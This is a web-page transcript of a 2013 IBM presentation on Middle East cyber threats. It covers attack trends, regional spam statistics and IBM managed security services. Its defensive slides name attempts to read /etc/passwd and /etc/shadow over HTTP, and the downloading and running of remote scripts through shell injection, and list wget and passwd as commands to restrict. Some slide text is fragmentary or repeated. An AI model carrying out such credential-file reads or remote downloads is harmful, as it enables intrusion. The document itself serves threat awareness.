Presentation is loading. Please wait.

Presentation is loading. Please wait.

IBM Security Systems MENA Cyber Security - targeted attacks, expanding risks, and the changing threat landscape Tamer Aboualy, Ph.D. IBM MEA Security Services.

Similar presentations


Presentation on theme: "IBM Security Systems MENA Cyber Security - targeted attacks, expanding risks, and the changing threat landscape Tamer Aboualy, Ph.D. IBM MEA Security Services."— Presentation transcript:

1 IBM Security Systems MENA Cyber Security - targeted attacks, expanding risks, and the changing threat landscape Tamer Aboualy, Ph.D. IBM MEA Security Services CTO April, 9, 2013 Findings from XF 2012 Annual Trend and Risk Report Covers latest security threats that have occurred so far this year as well as trends that we track over time in our different research groups Provides information in the areas of safe security practices when it comes to operating network infrastructures and in writing secure software And we cover what we think are new and emerging technologies that press into the current enterprise infrastructure that demands attention either due to adoption rates – or sheer overloads as is the case we are seeing with the adoption of mobile technology The report helps the reader better understand areas of risk, and provides education for areas of focus and improvement

2 Introduction: Dr. Tamer Aboualy
Tamer Aboualy, Ph.D CTO, IBM Security Services Africa & Middle East About Me Previous IBM Canada’s Security Services CTO. Executive sponsor and lead for MEA Security Operations Center (SOC) Previous technical lead for the development and implementation of Previous technical lead for Canada’s crypto and security methods for financial payment systems. Various security patents (Intrusion protection, cloud security, others) Expert speaker at security conferences (ISACA, GOVTECH, VISA, CLOUD, IDC Canadian Bankers Association, and many others). Education: Bachelors of Information Systems (Ryerson University Toronto Canada) Masters of Science in Telecommunications and Networks (Syracuse University, New York, USA) Ph.D. in Information Systems (Nova Southeaster University, Florida, USA)

3 The Evolving Threat Landscape
Agenda The Evolving Threat Landscape IBM X-Force 2012 Threat Research Report & Middle East Threat Research Security Intelligence Offerings Portfolio

4 The Evolving Threat Landscape
Security Today The Evolving Threat Landscape

5 IT Security has become a routine Board Room discussion
Business Results Brand Image Systems Availability Legal Exposure Personal Harm Audit Risk Sources Sony breach: HSBC breach: Epsilon breach: TJX breach: TJX Companies, Inc. press release, 8/14/2007, Lulzec breach: Zurich Insurance breach: (Financial Services Authority of Britain) *Sources for all breaches shown in speaker notes

6 Motivations and sophistication are rapidly evolving
1995 – 2005 1st Decade of the Commercial Internet 2005 – 2015 2nd Decade of the Commercial Internet Motive Nation-state actors National Security Espionage, Political Activism Competitors, hacktivists Monetary Gain Organized criminals with sophisticated tools Revenge Insiders, using inside information Curiosity Script-kiddies or hackers Adversary JK

7 The new security landscape - Sophisticated attackers are a primary concern
Threat Profile Type Share of Incidents Attack Type Advanced threat / mercenary National governments Terrorist cells Crime Cartels 23% Espionage Intellectual property theft Systems disruption Financial Crime Malicious Insiders Employees Contractors Outsourcers 15% Intellectual Property Theft Unauthorized Access/ Hacktivist Social Activists 7% Web defacement Information Disclosure Opportunist Worm and virus writers “Script Kiddies” 49% Malware propagation Unauthorized Access Potential Impact Source: Government Accountability Office, Department of Homeland Security's Role in Critical Infrastructure Protection Cybersecurity, GAO ; IBM CyberSecurity Intelligence & Response Team, September 2012 7

8 IBM Cyber Intelligence Update
Pulse 2013 6/3/2018 IBM Cyber Intelligence Update Each Week The Average Company Experiences 2.6M Security Attacks Which Result in approximately 60 Security Incidents Companies with Mature Cyber Security Programs have 90% fewer incidents and are better prepared to respond to those that do occur more effectively IBM Cybersecurity Intelligence & Response Team, Q4’ 2012 Scorecard SK4_Security_Kristin_Lovejoy

9 IBM X-Force 2012 Threat Research & Middle East Threat Research

10 The mission of X-Force is to:
X-Force is the foundation for advanced security and threat research across the IBM Security Framework The mission of X-Force is to: Monitor and evaluate the rapidly changing threat landscape Research new attack techniques and develop protection for tomorrow’s security challenges Educate our customers and the general public Advanced Security and Threat Research, which includes the X-Force team, is the foundation for many of the pillars in the security product portfolio. As the team tasked with staying on top of the latest threats and vulnerabilities, the information it provides is a critical aspect of providing protection to the other parts of the framework. The rest of this deck will talk to the specific capabilities of this team, as well as some specific integration points between the X-Force research and the products to which they add value. 10

11 IBM’s global security resources span the globe
Security Research Centers Security Operations Centers 11 Security operations centers 9 Security research centers 11 Security solution development labs 400+ Security operations analysts 500+ Field security sales / tech specialists 4, Security and Compliance professionals IBM has security consultancy practices and dedicated security research capabilities across the globe 20,000+ devices under contract 3,700+ MSS clients worldwide 9B+ events managed per day 1,000+ security patents* 133 monitored countries (MSS)

12 What are we seeing? Key Findings from the 2012 Trend Report
Threats and Activity 40% increase in breach events for 2012 Sophistication is not always about technology SQL Injection, DDoS, Phishing activity increased from 2011 Java means to infect as many systems as possible Operational Security Software vulnerability disclosures up in 2012 Web application vulnerabilities surge upward XSS vulnerabilities highest ever seen at 53% Content Management Systems plug-ins provide soft target Saudi Arabia sent most SPAM in Q3 2012, and remains most SPAM’d country in the world Emerging Trends Social Media leveraged for enhanced spear-phishing techniques and intelligence gathering Mobile Security should be more secure than traditional user computing devices by 2014

13 2011: “The year of the targeted attack”
2011 Sampling of Security Incidents by Attack Type, Time and Impact Conjecture of relative breach impact is based on publicly disclosed information regarding leaked records and financial losses Attack Type SQL Injection URL Tampering Spear Phishing 3rd Party Software DDoS SecureID Trojan Software Unknown Online Gaming Gaming Central Government IT Security Online Gaming Enter-tainment Defense Central Govt Consumer Electronics Central Government Online Services Banking Consulting Online Services Banking Online Gaming Online Gaming Marketing Services National Police Gaming Heavy Industry Consulting Internet Services Entertainment Consumer Electronics Defense Online Gaming Online Gaming IT Security Police Insurance Entertainment Central Government Agriculture Apparel State Police Central Government This chart is from the 2011 report – which we called the Year of the Targeted Attack Highlights the activity that was covered in the press last year Color of circles represent tech means used by attackers to breach these customers The size of the circle is a very rough estimate of the possible financial impact that might have occurred based on what was reported publically This chart is meant to represent the volume of activity that is happening out there – you can see it is quite heavy considering this is a mere sampling of what was probably actually going on This attack activity is driving discussions at the board level of organizations and its asking executives in companies to determine where they are prepared for these types of events where one to occur on their networks In 2012 the attack trend continues Most recent example announced publically last week by Adobe – an APT to their network As we move forward we’ll discuss we’ll discuss some of the specific attack activity and the methods used by attackers to breach systems and networks Financial Market Government Consulting IT Security Defense Gaming Central Govt Tele-communications Central Govt Consumer Electronics Internet Services Central Government Central Government State Police Size of circle estimates relative impact of breach in terms of cost to business Online Gaming Defense National Police Central Government Central Government Consumer Electronics Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Source: IBM X-Force® Research 2011 Trend and Risk Report 13

14 2012: The explosion of breaches continues!
2012 Sampling of Security Incidents by Attack Type, Time and Impact Conjecture of relative breach impact is based on publicly disclosed information regarding leaked records and financial losses Source: IBM X-Force Intelligence Report

15 MSS 2012 - Breakout of Security Incidents by Country

16 Web application vulnerabilities surge upward
1616 Web application vulnerabilities surge upward 14% In 2011 there were 2921 web vulnerabilities, 2012 there were 3551 Web Application Vulnerabilities Represented 43% Web application vulnerabilities surged 14% from 2,921 vulnerabilities in 2011 to 3,551 vulnerabilities in Cross-site scripting vulnerabilities accounted for over half of the total web application vulnerabilities disclosed in Not surprisingly, the alternating year of total vulnerabilities rising and falling coincides with the amount of web application vulnerabilities 16 16

17 MSS 2012 - Ranking Security Incidents

18 Tried and true techniques - Distributed Denial of Service (DDoS)
1818 Threats Operational Security Emerging Trends Tried and true techniques - Distributed Denial of Service (DDoS) High profile DDoS attacks marked by a significant increase in traffic volume Implementation of botnets on compromised web servers in high bandwidth data centers Denial of Service (DoS or DDoS) is another approach where attackers modified their tactics to increase sophistication saw an enormous increase in DoS traffic volumes using up to 60 – 70 Gbps of data driven by compromised 24X7 higher bandwidth web servers instead of PCs. In recent weeks, attackers are now generating as much as 300Gbs of DDoS traffic. Hacktivists including Anonymous and LulzSec selected DDoS as their weapon of choice, and the ready availability of exploit toolkits such as ‘itsnoproblembro’ provided upgraded technology to even the rank-and-file antagonists. An interesting twist to banking DDoS attacks was implementation of botnets on compromised web servers residing in high bandwidth data centers. Outdated CMS installations and plugins allowed attackers shell access to many vulnerable web servers. This technique assisted in much higher connected uptime as well as having more bandwidth than home PC’s to carry out the attacks. Attackers are now generating as much as 300Gbs of DDoS traffic by compromising high bandwith servers. Hacktivists including Anonymous and LulzSec selected DDoS as their weapon of choice, and the ready availability of exploit toolkits such as ‘itsnoproblembro’ provided upgraded technology to even the rank-and-file antagonists 18 18

19 Tried and true techniques - SQL and Command Injection attacks
1919 Tried and true techniques - SQL and Command Injection attacks Dramatic and sustained rise in SQL injection-based traffic Alerts came from all industry sectors, with a bias toward banking and finance targets Denial of Service (DoS or DDoS) is another approach where attackers modified their tactics to increase sophistication saw an enormous increase in DoS traffic volumes using up to 60 – 70 Gbps of data driven by compromised 24X7 higher bandwidth web servers instead of PCs. Hacktivists including Anonymous and LulzSec selected DDoS as their weapon of choice, and the ready availability of exploit toolkits such as ‘itsnoproblembro’ provided upgraded technology to even the rank-and-file antagonists. IBM MSS noted a dramatic and sustained rise in SQL injection-based traffic Alerts came from all industry sectors, with a bias toward banking and finance targets. Anonymous and Lulsec were major players in the SQL tactics. Most activity from automated scanners like LizaMoon SQL Injection is specially formatted statements to manipulate underlining web app. 15 days after Sony announced fixed their breach, Lulsec posted 150K customer account details! Typically used first to understand DB schema, then used to retrieve data we seen first newer attack. Attackers would inject script and gain root access When was the last time you checked your web application? 19 19

20 IBM Security MSS – Top Volume Signatures for 2011 and 1H 2012 (based on MSS global volumes)
SQL Slammer. Most durable Internet Malware. But levels decreasing significantly Microsoft sw part of Windows SysInternals. Command-line based on remote admin tools. Like light weight Telnet HTTP Unix Password - Attempts to access the password ( /etc/password and /etc/shadow file) on UNIX systems through HTTP

21 Shell Command Injection attacks
2121 Shell Command Injection attacks This year, we have seen an uptake in a different kind of web application attack activity and this called Shell Command Injections. Instead of injecting database commands through the web application, attackers inject command line commands that run on the operating system that the web application is running on. You can see in this chart a pretty significant increase in this activity at the end of – so we are starting to see some automated Shell Command Inject attacks that work largely the same way as the SQL injection attack activity worked but this is a vulnerability that has probably received less focus over that last few years although as a consequence of the increased activity we’ve seen, we think organizations should start paying more attention to it. Executing of system shell commands. Typically involves server download of a remote script an storing it in tmp directory. Then executing it. Script designed to maintain remote control, gather intel, and establish command and control back to attacker computer. Also used as lunch pad to infiltrate other servers. Mitigated by proper configuration and sanitization of ALL INPUTS and eliminating or restricting server software access to shell commands like wget,passwd, dir, ls. 21

22 Seems to have reached a plateau
2222 SSH brute force activity Seems to have reached a plateau We also saw this spike in volume at the end of the year in SSH brute forcing. This is one of the most common types of attacks we see on the internet where people are scanning for computers running SSH and they will try to brute-force user names and passwords on those computers. We’re not sure if this huge spike is an anomaly or if this will continue to be a problem in 2012 but it certainly is alarming and again, if you have SSH running on a computer it is important to be sure you have good passwords because if you don’t those passwords will quickly be automatically compromised. Brute force attempts to access a system by attempting large number of password possibilities. Attack can allow hacker to view, copy, delete, import, or execute code/files. Many organizations still use weak or default SSH user ID and passwords. Organizations should use strong passwords or authentication methods. 22

23 Anonymous proxies on the rise
Approximately 4 times more anonymous proxies than seen 3 years ago Some used to hide attacks, others to evade censorship Signature detects situations where clients are attempting to access websites through a chain of HTTP proxies Could represent legitimate (paranoid) web surfing attackers obfuscating the source address of launched attacks against web servers Another area where we have seen a lot of activity is anonymous proxies. In fact, In the first half of 2011, there were about four times as many anonymous proxies registered as there were three years ago. Although this activity appears to have tapered off a little in the second half of the year, over all the trend is up over 2010 numbers. Anonymous proxies are a critical type of website to track because of the ease that proxies provide in allowing people to hide potentially malicious intent.

24 January 2013 SPAM Report Saudi Arabia and Qatar MOST Spammed countries! Source: Symantec Intelligence Report

25 January 2012 February 2012 May 2012 Source: Symantec Intelligence Report

26 June 2012 July 2012 August Source: Symantec Intelligence Report

27 2012 Summary of SPAM for GCC Receiving Countries
November 2012 September 2012 October 2012 December 2012 2012 Summary of SPAM for GCC Receiving Countries Saudi Arabia: Number 1 SPAM receiving country except for 1 month was #2. Qatar: 6 months Oman: 3 months Kuwait: 2 months Source: Symantec Intelligence Report

28 Saudi Arabia Top SPAM Producing Country in Q3 2012
The Trend report reported that Saudi Arabia was the top SPAM Producing country in Q (see trend micro graphic). However others IBM, Symantec, and others reported that Saudi Arabia was the top SPAM producing country for a few weeks or a month. According to SpamRankings.net the FESTI botnet used SaudiNet for spamming activities, making Saudi Arabia, a newcomer, the top spam-sending country in Q3 2012 Spammers were probably taking advantage of the fact that Saudi Arabia-hosted IP addresses will not raise red flags. Source: Trend Intelligence Report

29 X-Force MSS 2012 – SPAM Volumes vs SPAM Sent From Saudi Arabia, India, Peru, and Spain
Saudi Arabia overtook India as top SPAM producing country for a short period.

30 Security Landscape in the Kingdom
Security Landscape in the Kingdom KSA double the global average of infected computers! Source: Microsoft Regional Security Intelligence Report

31 Categories of Unwanted Software (malware) in Saudi Arabia
Source: Microsoft Regional Security Intelligence Report

32 Comparing the Middle East and Gulf Countries
Palestine Iraq Egypt UAE Saudi Arabia Kuwait Qatar Oman Global Average

33 Protecting Our Clients
Managed Security Solutions Consulting Security solutions

34 IBM Managed Security Services Are Provided Locally in Saudi Arabia
MSS business founded 1995 Employee tenure average 4.5 yrs Embedded X-Force intelligence Experience & Expertise Forrester Wave Gartner Magic Quadrant Frost & Sullivan Market Leadership Riyadh, KSA Fully redundant services BC/DRP test performed annually SSAE-16, PCI, FFIEC, ITCS-104 BCP/DRP & Compliance MSS Global Facts and Figures 11 Security Operations Centers 3,700+ MSS clients worldwide 20,000+ security devices 15B+ security events daily Recording over 30k incident daily Monitoring in 133 countries Using a grid of 725+ systems Maintaining 99.9+% availability 6,000 researchers, developers and subject matter experts working security initiatives worldwide

35 Clients can be confident knowing that IBM Security Services are backed by IBM’s strong market leadership and analyst recognition IBM Managed Security Services IBM Security Consulting Services “IBM has the largest client base of the participants... Clients praised the flexibility, knowledge, and responsiveness …while also noting the company’s excellent documentation. Organizations looking for a high-quality vendor that can do it all and manage it afterwards should consider IBM.” Source: Forrester Research Inc. “Forrester WaveTM”: Information Security Consulting Services, Q1 2013”. And Forester Wave: Managed Security Services providers Q1, 2012 Full report can be accessed at

36 IBM has a broad base of consulting services to provide end to end solutions.
Security Consulting & Professional Services 6000+ Security Consultants & Architects Assess security risk and compliance, evolve security program Managed Services Globally available managed security services platform Manage security operations, detect and respond to emerging risk 9

37 Detailed Portfolio View
Security Strategy, Risk and Compliance Cybersecurity Assessment and Response Security Risk Assessment Security HealthCheck Information Security Assessment Policy Development Cloud Security Consulting PCI, SCADA, Compliance Emergency Response Services Penetration Testing Application Security Assessment Application Source Code Assessment Security Operations Optimization Identity & Access Management Strategy and assessment Design and deployment SIEM Design Identity Assessment and Strategy User Provisioning and Access Mgmt Total Authentication Solution Managed / Cloud Identity Infrastructure and Endpoint Data and Application Security Deployment and migration Staff augmentation Data Security Strategy and Assessment Encryption Endpoint and Network Data Loss Prevention Managed Security Managed SIEM Intrusion Detection and Prevention Firewall Unified Threat Mgmt Managed Protection X-Force Threat Analysis Hosted and Wed Hosted Vulnerability Mgmt Hosted Security Event and Log Mgmt Hosted Application Sec Mgmt IBM Confidential

38 Security Requirements
Managed Security Solutions portfolio can address a wide variety of challenges and business requirements Managed Security Services Cloud security services Managed firewall services Managed IPS1 and IDS2 services Managed UTM3 services Managed Security Information and Event Management Hosted vulnerability management services Hosted security event and log management services Hosted IBM X-Force® threat analysis services Security Requirements Multiple device types and vendors supported 1Intrusion Protection System 2Intrusion Detection System 3Unified threat management

39 Managed Network Security Services: Firewall, IDPS, UTM
Solution Overview IBM’s Managed Security Services for Firewall, IPS and UTM are designed to reduce the operational overhead associated with the day to day management of core security technologies that provide the foundational elements for an organization’s overall security posture. These offerings combine management, monitoring, and maintenance across a variety of leading technologies and service levels. Key Features Support for market leading technologies Checkpoint, Cisco, IBM, Juniper, McAfee, Tipping Point, Sourcefire, Palo Alto, etc. Support for comprehensive product features Most major product features are supported: Virtualization, multiple policies, traffic shaping, content security, custom signatures, etc. Industry leading service level agreements Service level agreements that set the benchmark for the industry including incident response, change management, system monitoring, portal availability, content updates, etc. Two offering packages to ensure flexibility The offerings are designed to meet the needs of less demanding to the most mission critical of environments. Integrated service views via the IBM Virtual SOC IBM’s proprietary web based interface ensures real-time on-demand access to the latest service information including alerts, advisories, system configuration, and comprehensive workflow and reporting capability. Customer Pain Points Multiple technologies create a challenge for skills management Proper security administration requires round the clock support, Compliance mandates competency beyond that of many organizations Security teams are needed for more strategic activities but security technologies remain complex and cumbersome to implement. Largest segment of MSS revenue comes from MSS services Solutions for new device role out (green field) or existing device take over from customer – take overs require a bit more planning We provide policy management, device health and availability monitoring, security event monitoring Faster time to deploy and reduced operational overhead within multi-vendor environments. Provides 24x7 support for round the clock monitoring, response, and management. 39 39

40 Cloud Security Services: Security Event and Log Management
Solution Overview The Security Event and Log Management Service (SELM) enables compilation of the event and log files from network applications, operating systems, and security technologies into one seamless platform. The SELM offering allows for automated analysis of IPS data as well as robust query and research capabilities against a variety of disparate log types. Key Features Two tiers of service SELM is available in Standard and Select service levels, allowing for varying degrees of analysis and analytics to be applied to varying data types. Integrated workflow and analysis capabilities With SELM’s integrated workflow and analysis capabilities, security issues can be investigated, escalated, and recorded using IBM’s web-based tools. Seamless blending of MSS and non-MSS data SELM allows for data of managed and unmanaged devices to be stored in the same systems and seamlessly interacted with as though all data is part of a common data set. Custom log parser and correlation engine Easily use regular expressions to add support for custom log sources and correlation rules. Unique IBM functionality! Forensically sound storage and archival SELM employs best practice processes for data in motion and at rest as suggested by IBM’s own Emergency Response Services team. Customer Pain Points Information and event management solutions can be overly complex SIM implementation can take months and hundreds of thousands of dollars Many solutions struggle to scale when real-time analysis is required Reporting requirements are often not met by off-the-shelf solutions Improved time to value by leveraging an on-demand cloud- based platform versus cumbersome CPE deployment options. Quickly analyze data from multiple geographies and technologies via a single web-accessible interface. Cloud-based deployment allows for seamless off-site storage of critical log data. Optional outsourcing of event monitoring activity to IBM experts on a shift-by-shift basis! The Hosted Security Event and Log Management solution is designed to provide a cloud-based offering around log and event management and collection for our customers. The general idea is to collect data from operating systems, applications, network infrastructure, and security devices, and bring that information into the cloud in a secure and streamlined fashion. Then, that data can be properly archived and stored for long-term purposes so that the information can be queried and analyzed for potential security issues and can actually be run through a variety of intelligent rules to identify potential problems or events of interest that a customer might wish to explore more deeply. This service can be used in a standalone capacity by customers who are looking to simplify the process of security, information, and event management by leveraging our low-cost cloud-based solution, or it can also be used in conjunction with the rest of our managed services for customers who are looking to complete the picture, customers who are looking to bring together data from devices that they manage on their own with devices that IBM might also be managing for them under other Managed Security Services offerings. So, think for a moment about a customer who has some intrusion prevention devices under management from IBM and also has some intrusion prevention devices they manage on their own. By leveraging the Security Event and Log Management solution, they could actually bring all of that data into one place to more quickly complete security incident investigations, to more effectively understand the impact of a potential security attack and also to get more visualization into what might be occurring across the overall security deployment. 40

41 Cloud Security Services– Hosted Vulnerability Management overview
Solution Overview Offers network-based vulnerability assessment from the cloud via the VSOC web portal. Scans can be configured and scheduled via the web, with scanning performed from the cloud or via IBM managed scanners at the customer premises. Results are archived in the cloud and accompanied by reporting, workflow, and remediation capabilities. Core Capabilities Vulnerability management Agentless scanning from both inside and outside the firewall to find exposures. Remediation guidance and workflow Fix vulnerabilities quickly and easily with the information provided in remediation reports. PCI compliance assistance IBM can serve as an approved scanning vendor (ASV) in support of PCI compliance initiatives. Intelligent scanning Delivers accurate scanning results in less time with a system that follows an assessment process similar to that used by ethical hackers. Fewer false positives mean less time spent tracking down “potential” vulnerabilities. Web application vulnerability detection Identifies SQL injection, cross-site scripting, and other high-risk vulnerabilities in web applications. Database vulnerability detection Identifies vulnerabilities in common databases and database configurations. Customer Pain Points Vulnerabilities allowing hackers easy access to client systems Proper assessment and remediation are required for compliance initiatives Today’s solutions are difficult to use and manage Customers can’t prioritize remediation efforts for identified vulnerabilities Faster time to deploy and more accurate detection of vulnerabilities, helping customers identify risks and ultimately improve their security posture More efficient end-to-end process for remediating vulnerabilities, and better tracking for compliance purposes Streamlined SaaS delivery model gives customers full control without the expense and distraction of owning and managing scanning infrastructure The Hosted Vulnerability Management Service (or VMS) was recently updated in late 2010 to create an entirely new experience for our customers. And, this update essentially included a complete overhaul of the offering, brand-new scanning technologies, and an entirely new web-based interface that is designed to help improve manageability of the overall data set and improve the scalability of our solution, supporting larger implementations and more efficient and effective management of the vulnerability remediation process. Vulnerability management, as a service, is important to customers because the vulnerability management process itself is complex and challenging. It requires workflow management so that not only are we scanning and assessing for vulnerabilities but we are also tracking the efforts toward closing those vulnerabilities in a programmatic fashion. Doing this can be difficult because there are not a lot of technology solutions out there to accomplish this and many organizations often resort to open source or homegrown solutions to meet this need, and those solutions generally are not optimized and result in more time being spent on the process than necessary. IBM recommends solving that problem through our web-based, Software-as-a-Service vulnerability management solution. This solution provides external scanners that are located in IBM data centers that can be controlled by the customer through IBM’s Virtual SOC Portal interface. There, they can request scans to be run against specific IP addresses, mandate the actual policies, and have IBM’s external scanners reach across the Internet and scan their network perimeter to provide a hacker’s-eye view of potential vulnerability exposure within their network. Also, by deploying a managed scanner inside of the customer’s environment, and connecting that scanner into the Virtual SOC Portal, the customer can also initiate internal scans to get visibility of vulnerability exposures that would be representative of a potential insider threat. These types of scanning capabilities are complimented by detailed logs and scan result reviews inside of the web portal, as well as comprehensive dashboarding and reporting capabilities, as well. 41

42 Cloud Security Services: IBM X-Force Threat Analysis Service
Solution Overview IBM Security Services' X-FORCE Threat Analysis Service (XFTAS) is a security intelligence service that delivers customized information about a wide array of threats that could affect your network security. XFTAS helps you proactively protect your networks with detailed analyses of global online threat conditions. A single source for up-to-the minute, customized security information Expert analysis and correlation of global security threats Actionable data and recommendations that help you maintain your network security Easily accessed 24x7x365 through the VSOC Portal Partner with a trusted security advisor The Hosted X-FORCE Threat Analysis Service is designed to provide customers with a subscription-based security intelligence capability that helps keep organizations abreast of all of the latest security threats. It is populated on a regular basis by information from IBM’s X-FORCE, and it is designed to help organizations keep their finger on the pulse of the threat landscape. With the X-FORCE Threat Analysis Service, organizations know what the most current threats are, what those threats mean to their organization, whether or not those threats are worthy of potentially changing staffing or a security process or procedure within their operations center. This is a great way to aggregate information from many different sources and give customers’ security teams a single place to look to understand truly what is going on in the threat landscape. Threat Analysis Service is included as a bundled component with every Managed Security Service that we offer. This means that customers receive this service if they purchase any of the offerings that we have discussed today. However, for customers who are not subscribers to the rest of our Managed Security Services portfolio, they can also purchase this solution directly from IBM or one of our Business Partners. So, they can have a login to our Virtual SOC Portal to access all of the threat intelligence information even if they are not subscribers to the rest of our managed services. We also offer this service with a special remarketing license, and the remarketing license allows organizations to take information out of this service and actually distribute it to end users, to host it on intranet sites, and to use the information in other security research initiatives that they might have ongoing internally. Unique Value The IBM X-FORCE Threat Analysis Service combines high-quality, real-time threat information from an international network of Security Operations Centers with security intelligence from the X-Force research and development team to develop comprehensive evaluations and recommendations suited to your business.

43 Customers have full visibility into work being performed through
Customers have full visibility into work being performed through the Virtual Security Operations Center portal (V-SOC) Firewalls and IDS and IPS1 Applications Networking devices Vulnerability Aggregation Correlation Archival Reporting Workflow Virtual-SOC technology platform Security Operations Center (SOC) Normalize Aggregate Correlate Archive Escalate Remediate Internet Virtual-SOC portal Virtual Security Operations Center (V-SOC) Anti Virus and filtering

44 Thank You Gracias Danke Tack Asante sana Obrigado Dankie Merci Grazie
ευχαριστώ Tack Greek Hindi Swedish Спасибо Asante sana Thai Gracias Russian Swahili Spanish Thank You Obrigado Arabic Portuguese Danke Dankie Grazie Merci German Afrikaans Italian French Hvala Slovenian Simplified Chinese Korean Köszönöm Hungarian Japanese 44 44


Download ppt "IBM Security Systems MENA Cyber Security - targeted attacks, expanding risks, and the changing threat landscape Tamer Aboualy, Ph.D. IBM MEA Security Services."

Similar presentations


Ads by Google